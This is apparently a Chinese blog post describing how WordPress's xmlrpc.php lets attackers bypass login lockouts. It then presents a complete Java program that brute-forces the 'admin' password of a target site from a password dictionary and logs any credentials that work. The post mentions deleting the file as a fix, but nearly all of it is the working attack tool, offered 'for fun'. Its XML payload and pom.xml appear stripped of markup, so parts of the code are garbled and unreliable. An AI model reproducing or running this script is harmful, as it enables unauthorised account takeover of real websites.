Wordpress xmlrpc.php暴力破解漏洞

wordpress是很流行的开源博客，它提供远程发布文章的方法，就是使用跟路径的xmlrpc.php这个文件，最近爆出xmlrpc漏洞，漏洞原理是通过xmlrpc进行认证，即使认证失败，也不会被Wordpress安装的安全插件记录，所以不会触发密码输错N次被锁定的情况。因此就可能被暴力破解，如果密码又是弱口令的话，就相当危险了。最简单的解决办法，就是删除xmlrpc.php这个文件。闲来无事，用java写了暴力破解的脚本，其实就是拿着各种用户名、密码去不断调用xmlrpc.phpp这个文件，检测认证结果，很简单。只为娱乐，暴力破解的事情，大家慎重。

Xmlrpc.java源码如下：

    package com.yeetrack.security.wordpress;    import org.apache.http.client.ClientProtocolException;    import org.apache.http.client.config.RequestConfig;    import org.apache.http.client.methods.CloseableHttpResponse;    import org.apache.http.client.methods.HttpGet;    import org.apache.http.client.methods.HttpPost;    import org.apache.http.entity.StringEntity;    import org.apache.http.impl.client.CloseableHttpClient;    import org.apache.http.impl.client.HttpClients;    import org.apache.http.util.EntityUtils;    import org.slf4j.Logger;    import org.slf4j.LoggerFactory;    import org.testng.annotations.Test;    import java.io.*;    /**     * Created by victor wang on 2014/8/2.     * 利用wordpress xmlrpc漏洞，暴力破解密码     */    public class Xmlrpc    {        private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";        RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)                .setSocketTimeout(4000).build();        private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);        private CloseableHttpClient httpClient = HttpClients.custom()                .setUserAgent(userAgent)                .setDefaultRequestConfig(requestConfig)                .build();        /**         * 校验域名是否存在xmlrpc.php这个文件         */        private boolean checkXmlRpcFile(String domain)        {            domain = wrapperUrl(domain);            if(domain==null)                return false;            HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php");            get.addHeader("User-Agent", userAgent);            CloseableHttpResponse response = null;            String resultString = null;            try {                response = httpClient.execute(get);                if(null == response || response.equals(""))                    return false;                resultString = EntityUtils.toString(response.getEntity());            } catch (IOException e) {                e.printStackTrace();            }            return resultString.contains("XML-RPC server accepts POST requests only.");        }        /**         * 暴力尝试         */        private boolean forceLogin(String username, String password, String url)        {            //尝试登录            HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php");            post.addHeader("User-Agent", userAgent);            String xmlString = "
    
    
       
     
      wp.getUsersBlogs
       
     
         
      
      
       "+username+"
         
      
      
       "+password+"
        
     
    ";            StringEntity entity = null;            try {                entity = new StringEntity(xmlString);                post.setEntity(entity);                CloseableHttpResponse response = httpClient.execute(post);                String loginResult = EntityUtils.toString(response.getEntity());                if(null== loginResult || loginResult.equals(""))                    return false;                if(loginResult.contains("isAdmin")) {                    logger.info(url + "登录成功，userename--->" + username + "  password--->" + password);                    return true;                }            } catch (UnsupportedEncodingException e) {                e.printStackTrace();            } catch (ClientProtocolException e) {                e.printStackTrace();            } catch (IOException e) {                e.printStackTrace();            }            return false;        }        /**         * 净化url，去掉http://或者末尾的path         */        private String wrapperUrl(String url)        {            if(null == url || url.equals(""))                return null;            if(url.startsWith("http://"))                url = url.substring(7);            if(url.contains("/"))                url = url.substring(0, url.indexOf("/"));            return url;        }        /**         * 破解         */        @Test        public void test()        {            String url = "http://somewordpress.com/xmlrpc.php";            if(!checkXmlRpcFile(url)) {                logger.info(url+"--->不存在xmlrpc漏洞");                return;            }            File file = new File("src/main/resources/1pass00.txt"); //密码字典，这个网上一堆一堆的，或者自己生成也可            try {                FileReader fileReader = new FileReader(file);                BufferedReader bufferedReader = new BufferedReader(fileReader);                String line = null;                int count = 1;                while ((line = bufferedReader.readLine()) != null) {                    System.out.println("" + count + "  " + line);                    if(forceLogin("admin", line, url))                        break;                    count++;                    //Thread.sleep(500);                }            } catch (Exception e) { e.printStackTrace(); }        }    }

项目使用maven管理，使用了apache的httpclient和log4j，pom.xml代码如下：

    
        
    
             
     
      4.0.0
             
     
      com.yeetrack.security
             
     
      wordpress-xmlrpc
             
     
      1.0-SNAPSHOT